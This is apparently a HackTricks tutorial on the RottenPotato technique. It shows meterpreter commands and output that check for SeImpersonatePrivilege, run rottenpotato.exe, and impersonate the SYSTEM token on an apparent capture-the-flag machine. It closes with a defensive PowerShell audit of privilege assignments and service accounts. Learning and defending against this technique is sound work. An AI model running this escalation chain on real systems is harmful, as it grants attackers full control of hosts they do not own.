HackTricks
RottenPotato
The information on this page was extracted from this post.
Service accounts usually hold special privileges (SeImpersonatePrivilege), and this can be abused to escalate privileges.
I won’t go into the details on how this exploit works, the article above explains it far better than I ever could.
Let’s check our privileges with meterpreter:
```
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
```
Excellent, it looks like we have the privileges we need to perform the attack. Let’s upload rottenpotato.exe.
Back on our meterpreter session we load the incognito extension.
```
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah

Impersonation Tokens Available
========================================
No tokens available
```
We can see we currently have no Impersonation Tokens. Let’s run the Rotten Potato exploit.
```
meterpreter > execute -f rottenpotato.exe -Hc
Process 3104 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM
```
We need to quickly impersonate the token or it will disappear.
```
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Success! We have our SYSTEM shell and can grab the root.txt file!
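The whole chain above hinges on a service account holding SeImpersonatePrivilege (and, here, SeAssignPrimaryTokenPrivilege). The audit below is an added example, not code from the original post: it exports the local user-rights assignment with secedit, lists which principals hold those two privileges, and then lists the services and the accounts they log on as, so an administrator can see which custom service accounts carry the privilege and trim it where it is not needed. It assumes an elevated PowerShell session on the host being reviewed; the temp file name is arbitrary.

```powershell
# Added audit example (not from the original post). Requires an elevated session:
# secedit needs administrator rights to export the local security policy.
$inf = Join-Path $env:TEMP 'user-rights-audit.inf'   # arbitrary temp file name
secedit /export /cfg $inf /areas USER_RIGHTS | Out-Null
$lines = Get-Content $inf

# The two privileges the RottenPotato chain on this page relies on.
$wanted = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'

foreach ($priv in $wanted) {
    # Lines in the [Privilege Rights] section look like:
    #   SeImpersonatePrivilege = *S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-32-544
    $line = $lines | Where-Object { $_ -match "^$priv\s*=" }
    if (-not $line) { Write-Output "$priv : not assigned to anyone"; continue }

    $sids = ($line -split '=', 2)[1].Trim() -split ',' |
        ForEach-Object { $_.Trim().TrimStart('*') }

    foreach ($sid in $sids) {
        # Resolve the SID to a name; fall back to the raw SID for orphaned entries.
        try {
            $name = (New-Object System.Security.Principal.SecurityIdentifier($sid)).
                Translate([System.Security.Principal.NTAccount]).Value
        } catch { $name = '(unresolved)' }
        Write-Output "$priv : $name [$sid]"
    }
}
Remove-Item $inf -ErrorAction SilentlyContinue

# Services are the usual foothold for this technique, so list each service with the
# account it logs on as. Anything not running as LocalSystem / NT AUTHORITY\LocalService /
# NT AUTHORITY\NetworkService is a custom account worth checking against the list above.
Get-CimInstance Win32_Service |
    Where-Object { $_.StartName } |
    Select-Object Name, StartName, State |
    Sort-Object StartName, Name |
    Format-Table -AutoSize
```

The well-known SIDs S-1-5-6 (SERVICE), S-1-5-19 (LocalService), S-1-5-20 (NetworkService) and S-1-5-32-544 (Administrators) hold SeImpersonatePrivilege by default; a custom service account appearing beside them, or a service running as a domain user, is the case to review.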